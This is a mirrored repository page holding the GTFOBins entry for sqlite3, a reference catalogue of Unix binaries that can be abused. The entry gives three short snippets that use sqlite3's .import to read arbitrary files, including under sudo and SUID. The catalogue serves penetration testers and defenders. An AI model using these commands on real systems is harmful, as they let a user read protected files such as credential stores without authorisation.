1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-28 11:11:41 +01:00
GTFOBins.github.io/_gtfobins/sqlite3.md
2018-06-04 10:21:53 +00:00

28 lines
554 B
Markdown

---
functions:
sudo-enabled:
- code: |
LFILE=file_to_read
sudo sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
suid-enabled:
- code: |
LFILE=file_to_read
./sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
file-read:
- code: |
LFILE=file_to_read
sqlite3 << EOF
CREATE TABLE t(line TEXT);
.import $LFILE t
SELECT * FROM t;
EOF
---